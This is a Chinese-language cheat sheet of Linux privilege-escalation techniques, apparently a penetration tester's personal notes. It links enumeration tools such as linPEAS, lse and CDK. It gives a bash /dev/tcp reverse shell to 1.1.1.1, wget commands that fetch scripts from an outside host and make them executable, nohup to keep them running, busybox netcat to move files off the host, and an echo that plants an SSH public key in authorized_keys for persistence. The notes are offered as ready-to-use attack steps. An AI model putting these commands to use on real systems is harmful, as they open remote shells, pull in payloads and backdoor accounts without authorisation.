linux提权技巧

PEASS-ng

PEASS - 权限升级很棒的脚本套件（带颜色）

https://github.com/carlospolop/PEASS-ng

https://github.com/carlospolop/PEASS-ng/releases/download/20240114-925b57c0/linpeas.sh

linux 智能枚举

用于渗透测试和具有详细级别的 CTF 的 Linux 枚举工具

https://github.com/diego-treitos/linux-smart-enumeration

https://github.com/diego-treitos/linux-smart-enumeration/releases/download/4.14nw/lse.sh

CDK

使 K8s、Docker 和 Containerd 的安全测试变得更容易。

https://github.com/cdk-team/CDK

Busybox

在身处docker或者一些阉割系统中，可以拓展能使用的命令

https://www.busybox.net/downloads/binaries/1.30.0-i686/busybox

反弹shell

bash -i >& /dev/tcp/1.1.1.1/18899 0>&1

wget下载&&赋权

wget http://1.1.1.1:9000/lin.sh && chmod +x lin.sh

wget http://1.1.1.1:9000/busybox && chmod +x busybox

wget http://1.1.1.1:9000/1.sh && chmod +x 1.sh

nohup

nohup: 用于在用户退出登录或关闭终端后继续运行指定的命令。

命令使用 nohup（即“no hang up”）命令在后台运行一个脚本 lin.sh，并将其标准输出重定向到一个名为 1.txt 的文件中

nohup ./lin.sh > 1.txt

运行这条命令后，你可以安全地关闭终端，脚本会继续在后台运行，所有的输出会被保存到 1.txt 文件中。如果你还需要将错误输出也重定向到同一个文件中，可以使用以下命令：

nohup ./lin.sh > 1.txt 2>&1 &

这里的 2>&1 表示将标准错误（文件描述符 2）重定向到标准输出（文件描述符 1），并且最后的 & 符号表示在后台运行该命令。

Excel乱码转换

iconv -s -c -f utf-8 -t GBK 123.csv > 222.csv

发送端

busybox nc -w 3 0.0.0.0 12300 < app.jar

接收端

busybox nc -l -p 12300 > app.jar

先启动接收端

写公钥

先创建/home/confluence/.ssh/authorized_keys

再把公钥写进去

echo 'ssh-rsa AAAAB3Nzaasda= root@192-168-0-165' >> /home/sjt/.ssh/authorized_keys

docker传文件

docker cp 本机路径 docker实例名称:docker内路径

docker cp /root/dicts/domain_2w.txt arl_web:/code/app/dicts/

-.-